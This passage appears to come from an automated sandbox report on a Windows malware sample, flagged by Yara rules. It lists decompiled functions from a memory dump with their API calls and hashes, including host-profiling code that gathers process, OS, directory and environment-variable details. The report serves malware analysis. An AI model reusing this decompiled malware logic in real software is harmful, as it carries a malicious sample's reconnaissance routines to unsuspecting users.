                                    						}
                                    						_t73 =  &(_t72[0x212]);
                                    						if(_t72[0x212] != 0) {
                                    							E0008861A(_t73, 0);
                                    						}
                                    						E0008861A( &_v20, 0);
                                    						goto L1;
                                    					}
                                    					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
                                    					_t71 = _t43;
                                    					_v8 = _t71;
                                    					if(_t71 == 0) {
                                    						goto L9;
                                    					}
                                    					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
                                    						goto L7;
                                    					} else {
                                    						_t45 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                                    						_t72[0x218] = _t72[0x218] & 0x00000000;
                                    						E0008861A( &_v8, 0);
                                    						goto L16;
                                    					}
                                    				}
                                    				L1:
                                    				return 0;
                                    			}

















                                    APIs
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeaplstrcpyn
                                    • String ID:
                                    • API String ID: 680773602-0
                                    • Opcode ID: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                                    • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                                    • Opcode Fuzzy Hash: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                                    • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E0008E2C6(void* __fp0, intOrPtr _a4) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				void* _v28;
                                    				char _v32;
                                    				char _v544;
                                    				signed int _t40;
                                    				intOrPtr _t41;
                                    				intOrPtr _t48;
                                    				intOrPtr _t58;
                                    				void* _t65;
                                    				intOrPtr _t66;
                                    				void* _t70;
                                    				signed int _t73;
                                    				void* _t75;
                                    				void* _t77;
                                    
                                    				_t77 = __fp0;
                                    				_v20 = 0;
                                    				_v28 = 0;
                                    				_v24 = 0;
                                    				_t66 =  *0x9e6b4; // 0x12afa98, executed
                                    				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                                    				if(_t40 == 0) {
                                    					_t73 = 0;
                                    					if(_v20 <= 0) {
                                    						L9:
                                    						_t41 =  *0x9e6b4; // 0x12afa98
                                    						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                                    						return 0;
                                    					}
                                    					do {
                                    						_v16 = 0;
                                    						_v12 = 0;
                                    						_t48 =  *0x9e68c; // 0x12afab8
                                    						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                                    						_t70 = E00088604(_v16 + 1);
                                    						if(_t70 != 0) {
                                    							_v12 = 0x200;
                                    							_push( &_v32);
                                    							_push( &_v12);
                                    							_push( &_v544);
                                    							_push( &_v16);
                                    							_push(_t70);
                                    							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                                    							_t58 =  *0x9e68c; // 0x12afab8
                                    							_push(0);
                                    							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                                    								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                                    								_t75 = _t75 + 0xc;
                                    								Sleep(0xa);
                                    							}
                                    						}
                                    						_t73 = _t73 + 1;
                                    					} while (_t73 < _v20);
                                    					goto L9;
                                    				}
                                    				return _t40 | 0xffffffff;
                                    			}






















                                    APIs
                                    • Sleep.KERNELBASE(0000000A), ref: 0008E394
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                                    • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                                    • Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                                    • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
                                    				intOrPtr _v8;
                                    				signed int _v16;
                                    				char _v20;
                                    				void* _t24;
                                    				char _t25;
                                    				signed int _t30;
                                    				intOrPtr* _t45;
                                    				signed int _t46;
                                    				void* _t47;
                                    				void* _t54;
                                    
                                    				_t54 = __fp0;
                                    				_t45 = __edx;
                                    				_t46 = 0;
                                    				_t30 = __ecx;
                                    				if( *__edx > 0) {
                                    					do {
                                    						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
                                    						if(_t24 == 0) {
                                    							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
                                    							_v8 = _t25;
                                    							if(_t25 != 0) {
                                    								L6:
                                    								_v16 = _v16 & 0x00000000;
                                    								_v20 = _t25;
                                    								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
                                    								_t47 = _t47 + 0xc;
                                    							} else {
                                    								if(GetLastError() != 0xd) {
                                    									_t25 = _v8;
                                    									goto L6;
                                    								} else {
                                    									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
                                    								}
                                    							}
                                    						}
                                    						_t46 = _t46 + 1;
                                    					} while (_t46 <  *_t45);
                                    				}
                                    				return 0;
                                    			}














                                    APIs
                                      • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                                    • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                                    • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                                    • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                                    • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
                                    			E00085D7D(void* __eflags) {
                                    				char _v44;
                                    				intOrPtr _t7;
                                    				intOrPtr _t10;
                                    				void* _t11;
                                    				WCHAR* _t12;
                                    				WCHAR* _t13;
                                    				WCHAR* _t14;
                                    				intOrPtr _t15;
                                    				intOrPtr _t19;
                                    				intOrPtr _t22;
                                    				void* _t27;
                                    				WCHAR* _t28;
                                    
                                    				_t7 =  *0x9e688; // 0xf0000
                                    				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                                    				_t10 =  *0x9e684; // 0x12af8f0
                                    				_t28 = 2;
                                    				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                                    				if(_t11 == 0) {
                                    					_t22 =  *0x9e688; // 0xf0000
                                    					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                                    					 *0x9e6ac = _t12;
                                    					__eflags = _t12;
                                    					if(_t12 != 0) {
                                    						_t14 = E00089EBB();
                                    						__eflags = _t14;
                                    						if(_t14 == 0) {
                                    							_t28 = 0;
                                    							__eflags = 0;
                                    						} else {
                                    							_t15 =  *0x9e688; // 0xf0000
                                    							lstrcmpiW(_t15 + 0x228, _t14);
                                    							asm("sbb esi, esi");
                                    							_t28 = _t28 + 1;
                                    						}
                                    					}
                                    					_t13 = _t28;
                                    				} else {
                                    					_t19 =  *0x9e684; // 0x12af8f0
                                    					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                                    					_t13 = 3;
                                    				}
                                    				return _t13;
                                    			}
















                                    APIs
                                    • lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 00085DF2
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi
                                    • String ID:
                                    • API String ID: 1586166983-0
                                    • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                                    • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                                    • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                                    • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008BA05() {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				intOrPtr _t15;
                                    				void* _t16;
                                    				void* _t18;
                                    				void* _t21;
                                    				intOrPtr _t22;
                                    				void* _t24;
                                    				void* _t30;
                                    
                                    				_v8 = _v8 & 0x00000000;
                                    				_t15 =  *0x9e68c; // 0x12afab8
                                    				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                                    				if(_t16 != 0) {
                                    					_v12 = _v12 & 0x00000000;
                                    					_t18 = E0008B998(1,  &_v12); // executed
                                    					_t30 = _t18;
                                    					if(_t30 != 0) {
                                    						CloseHandle(_v8);
                                    						_t21 = _t30;
                                    					} else {
                                    						if(_v8 != _t18) {
                                    							_t22 =  *0x9e684; // 0x12af8f0
                                    							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                                    						}
                                    						_t21 = 0;
                                    					}
                                    					return _t21;
                                    				} else {
                                    					return _t16;
                                    				}
                                    			}













                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                                    • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                                    • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                                    • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
                                    				void _v44;
                                    				signed int _t8;
                                    				intOrPtr _t14;
                                    				intOrPtr _t15;
                                    				intOrPtr _t21;
                                    				void* _t24;
                                    				void* _t29;
                                    				void* _t35;
                                    
                                    				_t35 = __eflags;
                                    				_t24 = __ecx;
                                    				_t8 =  *0x9e688; // 0xf0000
                                    				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                                    				E000885EF();
                                    				E00088F78();
                                    				 *0x9e780 = 0;
                                    				 *0x9e784 = 0;
                                    				 *0x9e77c = 0;
                                    				E00085EB6(); // executed
                                    				E0008CF84(_t24);
                                    				_t14 =  *0x9e688; // 0xf0000
                                    				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                                    				_t15 =  *0x9e688; // 0xf0000
                                    				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
                                    				E0008B337( &_v44);
                                    				memset( &_v44, 0, 0x27);
                                    				E00085C26( &_v44, __fp0);
                                    				_t21 =  *0x9e684; // 0x12af8f0
                                    				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
                                    				return 0;
                                    			}












                                    APIs
                                      • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                                      • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,00083545), ref: 0008CF90
                                      • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,00083545), ref: 0008CFB1
                                      • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                                      • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,00083545), ref: 0008CFED
                                      • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                                      • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                                    • memset.MSVCRT ref: 00085D5F
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                                    • String ID:
                                    • API String ID: 4245722550-0
                                    • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                                    • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                                    • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                                    • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008861A(int _a4, intOrPtr _a8) {
                                    				int _t3;
                                    				intOrPtr _t4;
                                    				void* _t9;
                                    
                                    				_t3 = _a4;
                                    				if(_t3 == 0) {
                                    					return _t3;
                                    				}
                                    				_t9 =  *_t3;
                                    				if(_t9 != 0) {
                                    					 *_t3 =  *_t3 & 0x00000000;
                                    					_t4 = _a8;
                                    					if(_t4 != 0xffffffff) {
                                    						if(_t4 == 0xfffffffe) {
                                    							_t4 = E0008C392(_t9);
                                    						}
                                    					} else {
                                    						_t4 = E0008C379(_t9);
                                    					}
                                    					E0008874F(_t9, 0, _t4);
                                    					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
                                    				}
                                    				return _t3;
                                    			}







                                    APIs
                                    • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                                    • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                                    • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                                    • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                    				signed int _t5;
                                    				void* _t6;
                                    				void* _t10;
                                    				long _t15;
                                    				void* _t17;
                                    
                                    				_t15 = 2;
                                    				_t5 = E0008A5F7(_a4, _t15);
                                    				_t17 = _t5;
                                    				if(_t17 != 0) {
                                    					_t6 = E0008A65C(_t17, _a8, _a12); // executed
                                    					if(_t6 != 0) {
                                    						CloseHandle(_t17);
                                    						return 0;
                                    					}
                                    					_t10 = 0xfffffffe;
                                    					return _t10;
                                    				}
                                    				return _t5 | 0xffffffff;
                                    			}









                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                                    • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                                    • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                                    • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000898A6(void* __eflags, intOrPtr _a4) {
                                    				intOrPtr _t24;
                                    
                                    				_t24 = _a4;
                                    				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
                                    					CloseHandle( *(_t24 + 0x1c));
                                    					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
                                    					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
                                    						E0008984A(_t24, 1);
                                    					}
                                    					return  *((intOrPtr*)(_t24 + 0x18));
                                    				}
                                    				return 0;
                                    			}





                                    APIs
                                    • CloseHandle.KERNELBASE(?), ref: 000898CA
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                                    • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
                                    • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                                    • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E0008B337(void* __ecx) {
                                    				intOrPtr _t4;
                                    				void* _t5;
                                    				intOrPtr _t6;
                                    				void* _t12;
                                    				void* _t13;
                                    
                                    				_t4 =  *0x9e684; // 0x12af8f0
                                    				_t13 = 0;
                                    				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                                    				_t12 = _t5;
                                    				if(_t12 != 0) {
                                    					_t6 =  *0x9e684; // 0x12af8f0
                                    					_push(_t12);
                                    					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                                    						_t13 = 1;
                                    					}
                                    					CloseHandle(_t12);
                                    					return _t13;
                                    				}
                                    				return _t5;
                                    			}









                                    APIs
                                    • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                                    • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                                    • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                                    • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 86%
                                    			E0008D01F(void* __fp0) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				struct _SYSTEM_INFO _v52;
                                    				char _v180;
                                    				char _v692;
                                    				char _v704;
                                    				char _v2680;
                                    				void* __esi;
                                    				struct _OSVERSIONINFOA* _t81;
                                    				intOrPtr _t83;
                                    				void* _t84;
                                    				long _t86;
                                    				intOrPtr* _t88;
                                    				intOrPtr _t90;
                                    				intOrPtr _t95;
                                    				intOrPtr _t97;
                                    				void* _t98;
                                    				intOrPtr _t103;
                                    				char* _t105;
                                    				void* _t108;
                                    				char _t115;
                                    				signed int _t117;
                                    				char _t119;
                                    				intOrPtr _t124;
                                    				intOrPtr _t127;
                                    				intOrPtr _t130;
                                    				intOrPtr _t134;
                                    				intOrPtr _t147;
                                    				intOrPtr _t149;
                                    				intOrPtr _t152;
                                    				intOrPtr _t154;
                                    				signed int _t159;
                                    				struct HINSTANCE__* _t162;
                                    				short* _t164;
                                    				intOrPtr _t167;
                                    				WCHAR* _t168;
                                    				char* _t169;
                                    				intOrPtr _t181;
                                    				intOrPtr _t200;
                                    				void* _t215;
                                    				char _t218;
                                    				void* _t219;
                                    				char* _t220;
                                    				struct _OSVERSIONINFOA* _t222;
                                    				void* _t223;
                                    				int* _t224;
                                    				void* _t241;
                                    
                                    				_t241 = __fp0;
                                    				_t162 =  *0x9e69c; // 0x10000000
                                    				_t81 = E00088604(0x1ac4);
                                    				_t222 = _t81;
                                    				if(_t222 == 0) {
                                    					return _t81;
                                    				}
                                    				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                                    				_t83 =  *0x9e684; // 0x12af8f0
                                    				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                                    				_t3 = _t222 + 0x648; // 0x648
                                    				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                                    				_t5 = _t222 + 0x1644; // 0x1644
                                    				_t216 = _t5;
                                    				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                                    				_t227 = _t86;
                                    				if(_t86 != 0) {
                                    					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
                                    				}
                                    				GetCurrentProcess();
                                    				_t88 = E0008BA05();
                                    				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                                    				_t178 =  *_t88;
                                    				if(E0008BB8D( *_t88) == 0) {
                                    					_t90 = E0008BA62(_t178, _t222);
                                    					__eflags = _t90;
                                    					_t181 = (0 | _t90 > 0x00000000) + 1;
                                    					__eflags = _t181;
                                    					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                                    				} else {
                                    					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                                    				}
                                    				_t12 = _t222 + 0x220; // 0x220
                                    				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
                                    				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
                                    				_push( &_v16);
                                    				 *(_t222 + 0x224) = _t162;
                                    				_push( &_v8);
                                    				_v12 = 0x80;
                                    				_push( &_v692);
                                    				_v8 = 0x100;
                                    				_push( &_v12);
                                    				_t22 = _t222 + 0x114; // 0x114
                                    				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                                    				_t95 =  *0x9e68c; // 0x12afab8
                                    				_push(0);
                                    				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
                                    					GetLastError();
                                    				}
                                    				_t97 =  *0x9e694; // 0x12afa48
                                    				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                                    				_t26 = _t222 + 0x228; // 0x228
                                    				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                                    				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                                    				GetLastError();
                                    				_t31 = _t222 + 0x228; // 0x228
                                    				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
                                    				_t34 = _t222 + 0x114; // 0x114
                                    				_t103 = E0008B7A8(_t34,  &_v692);
                                    				_t35 = _t222 + 0xb0; // 0xb0
                                    				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                                    				_push(_t35);
                                    				E0008B67D(_t103, _t35, _t98, _t241);
                                    				_t37 = _t222 + 0xb0; // 0xb0
                                    				_t105 = _t37;
                                    				_t38 = _t222 + 0xd0; // 0xd0
                                    				_t164 = _t38;
                                    				if(_t105 != 0) {
                                    					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                                    					if(_t159 > 0) {
                                    						_t164[_t159] = 0;
                                    					}
                                    				}
                                    				_t41 = _t222 + 0x438; // 0x438
                                    				_t42 = _t222 + 0x228; // 0x228
                                    				E00088FD8(_t42, _t41);
                                    				_t43 = _t222 + 0xb0; // 0xb0
                                    				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
                                    				_t44 = _t222 + 0x100c; // 0x100c
                                    				E0008B88A(_t108, _t44, _t241);
                                    				_t199 = GetCurrentProcess();
                                    				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
                                    				memset(_t222, 0, 0x9c);
                                    				_t224 = _t223 + 0xc;
                                    				_t222->dwOSVersionInfoSize = 0x9c;
                                    				GetVersionExA(_t222);
                                    				_t167 =  *0x9e684; // 0x12af8f0
                                    				_t115 = 0;
                                    				_v8 = 0;
                                    				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                                    					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                                    					_t115 = _v8;
                                    				}
                                    				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                                    				if(_t115 == 0) {
                                    					GetSystemInfo( &_v52);
                                    					_t117 = _v52.dwOemId & 0x0000ffff;
                                    				} else {
                                    					_t117 = 9;
                                    				}
                                    				_t54 = _t222 + 0x1020; // 0x1020
                                    				_t168 = _t54;
                                    				 *(_t222 + 0x9c) = _t117;
                                    				GetWindowsDirectoryW(_t168, 0x104);
                                    				_t119 = E000895E1(_t199, 0x10c);
                                    				_t200 =  *0x9e684; // 0x12af8f0
                                    				_t218 = _t119;
                                    				 *_t224 = 0x104;
                                    				_push( &_v704);
                                    				_push(_t218);
                                    				_v8 = _t218;
                                    				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                                    					_t154 =  *0x9e684; // 0x12af8f0
                                    					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                                    				}
                                    				E000885D5( &_v8);
                                    				_t124 =  *0x9e684; // 0x12af8f0
                                    				_t61 = _t222 + 0x1434; // 0x1434
                                    				_t219 = _t61;
                                    				 *_t224 = 0x209;
                                    				_push(_t219);
                                    				_push(L"USERPROFILE");
                                    				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                    					E00089640(_t219, 0x105, L"%s\\%s", _t168);
                                    					_t152 =  *0x9e684; // 0x12af8f0
                                    					_t224 =  &(_t224[5]);
                                    					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                    				}
                                    				_push(0x20a);
                                    				_t64 = _t222 + 0x122a; // 0x122a
                                    				_t169 = L"TEMP";
                                    				_t127 =  *0x9e684; // 0x12af8f0
                                    				_push(_t169);
                                    				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                    					_t149 =  *0x9e684; // 0x12af8f0
                                    					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                    				}
                                    				_push(0x40);
                                    				_t220 = L"SystemDrive";
                                    				_push( &_v180);
                                    				_t130 =  *0x9e684; // 0x12af8f0
                                    				_push(_t220);
                                    				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                    					_t147 =  *0x9e684; // 0x12af8f0
                                    					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                    				}
                                    				_v8 = 0x7f;
                                    				_t72 = _t222 + 0x199c; // 0x199c
                                    				_t134 =  *0x9e684; // 0x12af8f0
                                    				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                    				_t75 = _t222 + 0x100c; // 0x100c
                                    				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
                                    				_t76 = _t222 + 0x1858; // 0x1858
                                    				E000922D3( &_v2680, _t76, 0x20);
                                    				_t79 = _t222 + 0x1878; // 0x1878
                                    				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
                                    				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
                                    				return _t222;
                                    			}

                                    APIs
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • GetCurrentProcessId.KERNEL32 ref: 0008D046
                                    • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
